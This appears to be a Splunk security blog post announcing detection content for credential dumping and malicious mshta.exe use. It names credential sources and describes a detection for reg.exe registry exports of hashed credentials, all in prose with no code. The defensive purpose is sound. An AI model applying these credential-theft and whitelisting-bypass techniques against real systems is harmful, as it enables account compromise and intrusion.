Mount an Effective Defense Against Credential Dumping

Last month, in unveiling his new “get-tough-on-cybercrime” plan, Deputy Attorney General (DAG) Rod Rosenstein remarked that Russian interference in the 2016 election was not going to be a one-time issue; that it had been going on for years and was likely to get worse as technology evolves. Events this summer—such as those of reports of continued Russian election interferenceChinese cloud hacks, and the re-emergence of the Emotet malware—underscore the DAG’s point: the need for effective cyberdefense is increasing and the threats are becoming progressively more dangerous.

As always, the best way to keep your organization protected is to be proactive—study attack techniques and monitor for signs that bad actors are using these methods to compromise your environment. Because the Splunk Security Research Team’s goal is to make you look like the cyberdeity you are, we’ve included Analytic Stories in our August releases to monitor for two such attack techniques: credential dumping and suspicious MSHTA activities.

Find out more below and update your Splunk Enterprise Security Content Update app today!  

Preventing Credential Dumping

Credential dumping—obtaining hashed or clear-text passwords for nefarious purposes—is a tried-and-true attack technique that enables lateral movement, potentially providing bad actors with access to confidential information or an opportunity to install malware.

Regardless of the motivation, the threat actors use a variety of sources and techniques to extract the stolen credentials, including the Security Accounts Manager (SAM), Local Security Authority (LSA) Secrets, NTDS from Domain Controller, or the Group Policy Preference (GPP) Files.

A new detection search released in this month’s Analytic Story on credential dumping monitors for the process reg.exe with the ”save” parameter, which specifies a binary export from the registry. In addition, it looks for the keys that contain the hashed credentials, which attackers may retrieve and use for brute-force attacks in order to harvest legitimate credentials.

You can implement other precautions against credential dumping in your environment, as well: change default passwords, don’t share credentials with those who don’t require them (Principle of Least Privilege), consider limiting password access to specific machines/IP addresses, and implement MFA.

Stay Alert to Suspicious MSHTA Activity

Another common adversary tactic is to bypass application whitelisting solutions via the mshta.exe process, which executes Microsoft HTML applications with the .hta suffix. These applications work the same way as regular web applications, only outside of the browser. In these attacks, threat actors use the trusted Windows utility to eproxy execution of malicious files, whether an .hta application, javascript, or VBScript.

One example of a notable mshta.exe attack was the Kovter malware that has been implicated in both ransomware and click-fraud attacks. Kovter utilized .hta to execute a series of javascript commands, each progressively more dangerous. According to the MITRE Partnership NetworkFIN7 has leveraged mshta.exe, as has the MuddyWater group, who used it to execute its POWERSTATS payload (which then used the utility to execute additional payloads).

It's important to note that .hta files are by no means the only file extension that bad actors may leverage when trying to obfuscate their presence in your environment. That said, MSHTA attacks remain a formidable threat.

An August ESCU release included an Analytic Story that can help you monitor for and detect techniques used by attackers who leverage the mshta.exe process to execute malicious code. We invite you to try it out and give us feedback, either via email or via the Feedback Center link in the ESCU App.

Install the Latest Version of ESCU

The Security Research group at Splunk sleeps better when we know that you're protected against the latest threats and vulnerabilities. So download the Splunk ESCU app today!


The Splunk Threat Research Team is an active part of a customer’s overall defense strategy by enhancing Splunk security offerings with verified research and security content such as use cases, detection searches, and playbooks. We help security teams around the globe strengthen operations by providing tactical guidance and insights to detect, investigate and respond against the latest threats. The Splunk Threat Research Team focuses on understanding how threats, actors, and vulnerabilities work, and the team replicates attacks which are stored as datasets in the Attack Data repository

Our goal is to provide security teams with research they can leverage in their day to day operations and to become the industry standard for SIEM detections. We are a team of industry-recognized experts who are encouraged to improve the security industry by sharing our work with the community via conference talks, open-sourcing projects, and writing white papers or blogs. You will also find us presenting our research at conferences such as Defcon, Blackhat, RSA, and many more.

Read more Splunk Security Content